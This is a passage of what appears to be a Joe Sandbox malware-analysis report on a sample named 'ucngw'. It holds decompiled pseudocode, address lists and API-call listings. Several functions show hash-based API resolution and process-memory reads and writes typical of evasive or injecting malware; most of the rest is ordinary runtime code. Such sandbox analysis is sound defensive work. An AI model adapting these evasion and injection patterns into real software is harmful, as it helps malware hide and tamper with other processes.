				_t64 = E10013CB0(0x2eca438c, _t69);
				_t23 = E10013CB0(0x929b1529, _t69);
				_t59 = E10013CB0(0x48fa9930, _t69);
				if(_t4 == 0 || _t64 == 0 || _t59 == 0) {
					return 1;
				} else {
					 *0x1001f39c = E10013BE0(_t64, 0x3e08f78b);
					 *0x1001f340 = E10013BE0(_t64, 0xb09315f4);
					 *0x1001f37c = E10013BE0(_t64, 0xdf27514b);
					 *0x1001f3b0 = E10013BE0(_t64, 0x95c03d0);
					 *0x1001f394 = E10013BE0(_t64, 0xda68238f);
					 *0x1001f3c4 = E10013BE0(_t64, 0x8b35a289);
					 *0x1001f3c8 = E10013BE0(_t64, 0xd0861aa4);
					 *0x1001f380 = E10013BE0(_t64, 0xf7c7ae42);
					 *0x1001f3c0 = E10013BE0(_t64, 0x4f58972e);
					 *0x1001f3a0 = E10013BE0(_t64, 0xefc7ea74);
					 *0x1001f390 = E10013BE0(_t64, 0xcce95612);
					 *0x1001f3a4 = E10013BE0(_t23, 0xecac43ec);
					 *0x1001f3d0 = E10013BE0(_t23, 0x7b104372);
					 *0x1001f398 = E10013BE0(_t59, 0xbebe71bd);
					return 0;
				}
			}






    0x10013e20
    0x10013e26
    0x10013e35
    0x10013e3c
    0x10013e4d
    0x10013e59
    0x10013e60
    0x10013e64
    0x10013f7c
    0x10013e7a
    0x10013e8b
    0x10013e9c
    0x10013ead
    0x10013ebe
    0x10013ecf
    0x10013ee0
    0x10013ef1
    0x10013f02
    0x10013f13
    0x10013f24
    0x10013f35
    0x10013f46
    0x10013f57
    0x10013f63
    0x10013f70
    0x10013f70

    APIs
    • LoadLibraryW.KERNEL32(advapi32.dll), ref: 10013E35
    • LoadLibraryW.KERNEL32(user32.dll), ref: 10013E3C
      • Part of subcall function 10013CB0: GetModuleHandleW.KERNEL32(ntdll.dll,?,771CF162,?,?,?,?,?,10011147,?,?,100111E0), ref: 10013CC0
      • Part of subcall function 10013CB0: NtQueryInformationProcess.NTDLL(000000FF,00000000,?,?,?,?,?,?,00000018,?), ref: 10013D0F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 100144D0, Relevance: 6.3, APIs: 5, Instructions: 79
    C-Code - Quality: 100%
    			E100144D0(void** __ecx, void** __edx) {
				intOrPtr _v8;
				char _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				intOrPtr _v88;
				void* _v92;
				void* _t32;
				void* _t35;
				void** _t41;
				long _t55;
				void* _t56;

				_v88 = 0x1001f2d0;
				_v80 = 0x1001f2d0;
				_t41 = __edx;
				_v92 =  &_v68;
				_t56 = 0;
				_v84 = 0;
				_v76 = 0;
				_v72 =  *((intOrPtr*)(__ecx + 4));
				if(E10014010( &_v92, __ecx, 0x40) == 0 || _v68 != 0x5a4d) {
					L8:
					return _t56;
				} else {
					_v76 =  *((intOrPtr*)(__ecx)) + _v8;
					_t32 = LocalAlloc(0x40, 0x18);
					_v92 = _t32;
					if(_t32 == 0) {
						goto L8;
					} else {
						E10014010( &_v92,  &_v76, 0x18);
						_t55 =  ==  ? 0xf8 : 0x108;
						_t35 = LocalAlloc(0x40, 0x108);
						_v84 = _t35;
						if(_t35 == 0) {
							L7:
							LocalFree(_v92);
							goto L8;
						} else {
							_t56 = E10014010( &_v84,  &_v76, _t55);
							if(_t56 == 0) {
								LocalFree(_v84);
								goto L7;
							} else {
								 *_t41 = _v84;
								LocalFree(_v92);
								return _t56;
							}
						}
					}
				}
			}
















    0x100144d8
    0x100144e4
    0x100144ec
    0x100144ee
    0x100144f2
    0x100144ff
    0x10014503
    0x10014507
    0x10014515
    0x100145cd
    0x100145d4
    0x1001452b
    0x10014535
    0x10014539
    0x1001453f
    0x10014545
    0x00000000
    0x1001454b
    0x10014555
    0x10014574
    0x1001457a
    0x10014580
    0x10014586
    0x100145c2
    0x100145c6
    0x00000000
    0x10014588
    0x10014596
    0x1001459d
    0x100145bc
    0x00000000
    0x1001459f
    0x100145a7
    0x100145a9
    0x100145b7
    0x100145b7
    0x1001459d
    0x10014586
    0x10014545

    APIs
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,00000018,10012590), ref: 10014539
    • LocalAlloc.KERNEL32(00000040,00000108), ref: 1001457A
    • LocalFree.KERNEL32(?), ref: 100145A9
    • LocalFree.KERNEL32(?), ref: 100145BC
    • LocalFree.KERNEL32(?), ref: 100145C6
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 10007DF2, Relevance: 6.3, APIs: 4, Instructions: 305
    C-Code - Quality: 75%
    			E10007DF2(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E10002F77(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E100100C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E100100C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0x10003a8b
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E10001E90(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E100100C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E10010140();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E10010140();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E10010140();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E100080F5(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E10010E40(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E100068B3();
					_t183 = 0x22;
					 *_t129 = _t183;
					E100067F7();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































    0x10007df2
    0x10007dfd
    0x10007e04
    0x10007e06
    0x10007e06
    0x10007e08
    0x10007e11
    0x10007e13
    0x10007e18
    0x10007e1e
    0x10007e34
    0x10007e39
    0x10007e3c
    0x10007e49
    0x10007e4e
    0x10007ea2
    0x10007eaa
    0x10007eac
    0x10007eae
    0x10007eb1
    0x10007eb1
    0x10007eb1
    0x10007eb7
    0x10007ebf
    0x10007ed2
    0x10007ed5
    0x10007ed7
    0x10007eda
    0x10007edb
    0x10007efc
    0x10007eff
    0x10007eff
    0x10007edd
    0x10007edd
    0x10007edf
    0x10007eea
    0x10007eea
    0x10007eec
    0x10007ef3
    0x10007eee
    0x10007eee
    0x10007eee
    0x10007eec
    0x10007f00
    0x10007f02
    0x10007f03
    0x10007f06
    0x10007f08
    0x10007f1c
    0x10007f0a
    0x10007f0a
    0x10007f0a
    0x10007f21
    0x10007f21
    0x10007f26
    0x10007f29
    0x10007f34
    0x10007f34
    0x10007f34
    0x10007f34
    0x10007f38
    0x10007f3f
    0x10007f40
    0x10007f43
    0x10007f46
    0x10007f46
    0x10007f48
    0x00000000
    0x00000000
    0x10007f60
    0x10007f67
    0x10007f6b
    0x10007f6e
    0x10007f71
    0x10007f73
    0x10007f73
    0x10007f73
    0x10007f75
    0x10007f78
    0x10007f7b
    0x10007f7d
    0x10007f85
    0x10007f8b
    0x10007f8e
    0x10007f91
    0x10007f92
    0x10007f95
    0x10007f98
    0x10007f98
    0x10007f9d
    0x10007fa0
    0x00000000
    0x00000000
    0x10007fb8
    0x10007fbd
    0x10007fc1
    0x00000000
    0x00000000
    0x10007fc5
    0x10007fc5
    0x10007fc8
    0x10007fc9
    0x10007fc9
    0x10007fcb
    0x10007fce
    0x00000000
    0x00000000
    0x10007fd0
    0x10007fd3
    0x10007fda
    0x10007fdd
    0x10007fe0
    0x10007ff6
    0x10007ff6
    0x10007ff6
    0x10007fe2
    0x10007fe2
    0x10007fe4
    0x10007fe7
    0x10007ff2
    0x10007fe9
    0x10007fec
    0x10007fec
    0x10007fe7
    0x00000000
    0x10007fe0
    0x10007fd5
    0x10007fd5
    0x10007fd7
    0x10007fd7
    0x10007f2b
    0x10007f2b
    0x10007f2e
    0x10007ff9
    0x10007ff9
    0x10007ffb
    0x10007ffd
    0x10008000
    0x10008001
    0x10008002
    0x10008003
    0x1000800b
    0x1000800b
    0x1000800b
    0x1000800d
    0x10008010
    0x10008013
    0x10008015
    0x10008015
    0x10008017
    0x10008029
    0x1000802d
    0x10008030
    0x10008037
    0x1000803f
    0x1000803f
    0x10008042
    0x10008044
    0x10008055
    0x10008055
    0x10008059
    0x10008059
    0x1000805c
    0x1000805e
    0x10008061
    0x00000000
    0x10008046
    0x10008046
    0x1000804c
    0x1000804c
    0x10008050
    0x10008063
    0x10008063
    0x10008067
    0x10008068
    0x1000806a
    0x1000806c
    0x100080ad
    0x100080ad
    0x100080af
    0x100080bc
    0x100080bc
    0x100080be
    0x100080c0
    0x100080c1
    0x100080c2
    0x100080c9
    0x100080cc
    0x100080ce
    0x100080ce
    0x100080cf
    0x100080d1
    0x100080d4
    0x100080d4
    0x100080d6
    0x100080d8
    0x00000000
    0x100080d8
    0x100080b1
    0x100080b3
    0x00000000
    0x00000000
    0x100080b5
    0x00000000
    0x00000000
    0x100080b7
    0x100080ba
    0x00000000
    0x00000000
    0x00000000
    0x100080ba
    0x10008073
    0x10008079
    0x10008079
    0x1000807b
    0x1000807c
    0x1000807d
    0x1000807e
    0x10008085
    0x10008088
    0x1000808a
    0x1000808b
    0x1000808d
    0x1000809a
    0x1000809a
    0x1000809c
    0x1000809e
    0x1000809f
    0x100080a0
    0x100080a7
    0x100080aa
    0x100080ac
    0x100080ac
    0x00000000
    0x100080ac
    0x1000808f
    0x1000808f
    0x10008091
    0x00000000
    0x00000000
    0x10008093
    0x00000000
    0x00000000
    0x10008095
    0x10008098
    0x00000000
    0x00000000
    0x00000000
    0x10008098
    0x10008075
    0x10008077
    0x00000000
    0x00000000
    0x00000000
    0x10008077
    0x10008048
    0x1000804a
    0x00000000
    0x00000000
    0x00000000
    0x1000804a
    0x10008044
    0x00000000
    0x10007f2e
    0x10007f29
    0x10007e50
    0x10007e52
    0x00000000
    0x10007e54
    0x10007e6a
    0x10007e6f
    0x10007e71
    0x10007e7d
    0x10007e83
    0x10007e84
    0x10007e86
    0x10007e88
    0x10007e93
    0x10007e93
    0x10007e96
    0x10007e98
    0x10007e98
    0x10007e9b
    0x10007e73
    0x10007e73
    0x10007e73
    0x00000000
    0x10007e71
    0x10007e20
    0x10007e20
    0x10007e27
    0x10007e28
    0x10007e2a
    0x100080dc
    0x100080e0
    0x100080e5
    0x100080e5
    0x100080f4
    0x100080f4

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C59A8A, Relevance: 6.1, APIs: 4, Instructions: 110
    C-Code - Quality: 82%
    			E00C59A8A(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t54;
				int _t56;
				signed int _t62;
				int _t65;
				short* _t66;
				signed int _t67;
				short* _t68;

				_t34 =  *0xc6a004; // 0x26d30358
				_v8 = _t34 ^ _t67;
				E00C5499F(_t54,  &_v28, __edx, _a4);
				_t56 = _a24;
				if(_t56 == 0) {
					_t53 =  *(_v24 + 8);
					_t56 = _t53;
					_a24 = _t53;
				}
				_t65 = 0;
				_t40 = MultiByteToWideChar(_t56, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00C51252(_t54, _v8 ^ _t67, _t65, _t66);
				}
				_t54 = _t40 + _t40;
				_t17 = _t54 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t66 = 0;
					L11:
					if(_t66 != 0) {
						E00C53610(_t65, _t66, _t65, _t54);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t66, _v12);
						if(_t46 != 0) {
							_t65 = GetStringTypeW(_a8, _t66, _t46, _a20);
						}
					}
					L14:
					E00C59BA7(_t66);
					goto L15;
				}
				_t20 = _t54 + 8; // 0x8
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t54 + 8; // 0x8
				_t62 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t66 = E00C561AB(_t62, _t48 & _t62);
					if(_t66 == 0) {
						goto L14;
					}
					 *_t66 = 0xdddd;
					L9:
					_t66 =  &(_t66[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00C5DD20();
				_t66 = _t68;
				if(_t66 == 0) {
					goto L14;
				}
				 *_t66 = 0xcccc;
				goto L9;
			}























    0x00c59a92
    0x00c59a99
    0x00c59aa5
    0x00c59aaa
    0x00c59aaf
    0x00c59ab4
    0x00c59ab7
    0x00c59ab9
    0x00c59ab9
    0x00c59abe
    0x00c59ad7
    0x00c59add
    0x00c59ae2
    0x00c59b81
    0x00c59b85
    0x00c59b8a
    0x00c59b8a
    0x00c59ba6
    0x00c59ba6
    0x00c59ae8
    0x00c59aeb
    0x00c59af0
    0x00c59af4
    0x00c59b40
    0x00c59b42
    0x00c59b44
    0x00c59b49
    0x00c59b60
    0x00c59b68
    0x00c59b78
    0x00c59b78
    0x00c59b68
    0x00c59b7a
    0x00c59b7b
    0x00000000
    0x00c59b80
    0x00c59af6
    0x00c59afb
    0x00c59afd
    0x00c59aff
    0x00c59aff
    0x00c59b07
    0x00c59b24
    0x00c59b2e
    0x00c59b33
    0x00000000
    0x00000000
    0x00c59b35
    0x00c59b3b
    0x00c59b3b
    0x00000000
    0x00c59b3b
    0x00c59b0b
    0x00c59b0f
    0x00c59b14
    0x00c59b18
    0x00000000
    0x00000000
    0x00c59b1a
    0x00000000

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000100,?,00000000,?,?,00000000), ref: 00C59AD7
      • Part of subcall function 00C561AB: RtlAllocateHeap.NTDLL(00000000,00C51FCA,?,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA,?,?,?,?), ref: 00C561DD
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C59B60
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C59B72
    • __freea.LIBCMT ref: 00C59B7B
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10009A3E, Relevance: 6.1, APIs: 4, Instructions: 68
    C-Code - Quality: 93%
    			E10009A3E() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E10009A07(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E10005DA1(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E10005D67(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












    0x10009a4d
    0x10009a53
    0x10009aab
    0x10009aab
    0x10009a55
    0x10009a56
    0x10009a5b
    0x10009a64
    0x10009a6a
    0x10009a70
    0x10009a75
    0x00000000
    0x10009a77
    0x10009a7d
    0x10009a82
    0x10009aa0
    0x10009a9a
    0x10009a9a
    0x10009a9c
    0x10009a9c
    0x10009aa3
    0x10009aa8
    0x10009a75
    0x10009aaf
    0x10009ab2
    0x10009ab2
    0x10009ac0

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 10009A47
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10009A6A
      • Part of subcall function 10005DA1: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,1000DDBB,00000001,00000000,?,10009B15,00000001,00000004,00000000,00000001,?,?,10005AA6), ref: 10005DD3
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10009A90
      • Part of subcall function 10005D67: HeapFree.KERNEL32(00000000,00000000), ref: 10005D7D
      • Part of subcall function 10005D67: GetLastError.KERNEL32(26C1DB24,?,100059D4,00000001,00000001), ref: 10005D8F
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10009AB2
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C5193F, Relevance: 6.1, APIs: 4, Instructions: 53timethread
    C-Code - Quality: 100%
    			E00C5193F() {
				signed int _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t21;
				signed int _t29;
				signed int _t32;
				signed int _t36;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t21 =  *0xc6a004; // 0x26d30358
				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = _v8 ^ GetCurrentProcessId();
					QueryPerformanceCounter( &_v24);
					_t29 =  &_v8;
					_t36 = _v20 ^ _v24.LowPart ^ _v8 ^ _t29;
					if(_t36 != 0xbb40e64e) {
						if((0xffff0000 & _t36) == 0) {
							_t29 = (_t36 | 0x00004711) << 0x10;
							_t36 = _t36 | _t29;
						}
					} else {
						_t36 = 0xbb40e64f;
					}
					 *0xc6a004 = _t36;
					 *0xc6a000 =  !_t36;
					return _t29;
				} else {
					_t32 =  !_t21;
					 *0xc6a000 = _t32;
					return _t32;
				}
			}











    0x00c51945
    0x00c51949
    0x00c5194d
    0x00c51960
    0x00c51973
    0x00c5197f
    0x00c51988
    0x00c51991
    0x00c51998
    0x00c519a1
    0x00c519aa
    0x00c519ae
    0x00c519b9
    0x00c519c2
    0x00c519c5
    0x00c519c5
    0x00c519b0
    0x00c519b0
    0x00c519b0
    0x00c519c7
    0x00c519cf
    0x00000000
    0x00c51966
    0x00c51966
    0x00c51968
    0x00000000
    0x00c51968

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00C51973
    • GetCurrentThreadId.KERNEL32 ref: 00C51982
    • GetCurrentProcessId.KERNEL32 ref: 00C5198B
    • QueryPerformanceCounter.KERNEL32(?), ref: 00C51998
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 100016BE, Relevance: 6.1, APIs: 4, Instructions: 53timethread
    C-Code - Quality: 100%
    			E100016BE() {
